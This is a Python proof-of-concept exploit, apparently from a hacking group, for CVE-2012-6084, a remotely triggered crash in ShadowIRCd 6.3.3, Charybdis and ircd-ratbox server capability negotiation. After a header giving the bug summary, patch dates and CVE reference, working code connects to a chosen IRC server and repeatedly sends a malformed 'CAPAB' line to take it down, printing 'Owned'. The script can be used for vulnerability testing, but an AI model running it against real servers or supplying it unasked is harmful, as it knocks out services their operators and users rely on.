#!/usr/bin/python3 ################################################################################### # # _ _ .__ .__ # __| || |_| | ____ ____ |__| ____ ____ # \ __ / | _/ __ \ / ___\| |/ _ \ / \ # | || || |_\ ___// /_/ > ( <_> ) | \ http://www.zempirians.com # /_ ~~ _\____/\___ >___ /|__|\____/|___| / # |_||_| \/_____/ \/ # # 00100011 01101100 01100101 01100111 01101001 01101111 01101110 # # Provided by: UberLame, Aph3x, Apetrick, O_O # ################################################################################### # # -=[ SHADOWIRCD 6.3.3 - Running vulnerable m_capab.c ] =- # # [P]roof [o]f [C]oncept, Null Point Reference, Denial of Service # # ################################################################################### # -=[ EXPLOIT ]=- # # Now that a patch has been secured we are releasing a proof of concept to test your # ircd against this vulnerability. This exploit was designed to work against # Shadowircd 6.3.3 running the following vulnerable code: # # +VULNERABLE+ # ../shadowircd/modules/m_capab.c - LINE(40) # {{mr_capab, 0}, mg_ignore, mg_ignore, mg_ignore, mg_ignore, mg_ignore} # # -=[ SUMMARY ]=- # # All versions of Charybdis are vulnerable to a remotely-triggered crash bug # caused by code originating from ircd-ratbox 2.0. (Incidentally, this means all # versions since ircd-ratbox 2.0 are also vulnerable.) # # The bug has to do with server capability negotiation. A malformed request will # trigger a crash due to invalid assumptions. # # -=[ PATCH ]=- # # January 1, 2013 - 12:55 PM GMT-6 # # Charybdis 3.4.2, ShadowIRCd 6.3.3 and Ratbox 3.0.8 have been released with an # integrated patch to resolve this issue. All admins should upgrade immediately. # # -=[ REFERENCE ]=- # # http://www.cvedetails.com/cve/CVE-2012-6084/ # ################################################################################### # Ohai, I Can Has Moar Cycles? <33 # # Eg: ./<file>.py -t <target> -p <port> ################################################################################### from argparse import ArgumentParser import socket def own( uri, port ): sock = socket.socket() try: ret = sock.connect_ex(( uri, int( port ) )) except: print( "\t[-] Failed To Connect To {}".format( uri ) ) exit() print( "\t[+] Connected, Sending Payload To {}:{}".format( uri, port ) ) while True: try: sock.send(b"\x43\x41\x50\x41\x42\x20\x0d\x0a") except socket.error as se: print( '\t[!] Owned <3' ) break sock.close() if __name__ == '__main__': parser = ArgumentParser( description='m_capab DOS PoC, We Can Has Moar Cycles?' ) parser.add_argument( '-t', '--target', dest='target', default='localhost', help='IRCD Address To Target' ) parser.add_argument( '-p', '--port', dest='port', default=6667, help='IRCD Port To Target' ) args = parser.parse_args() own( args.target, args.port )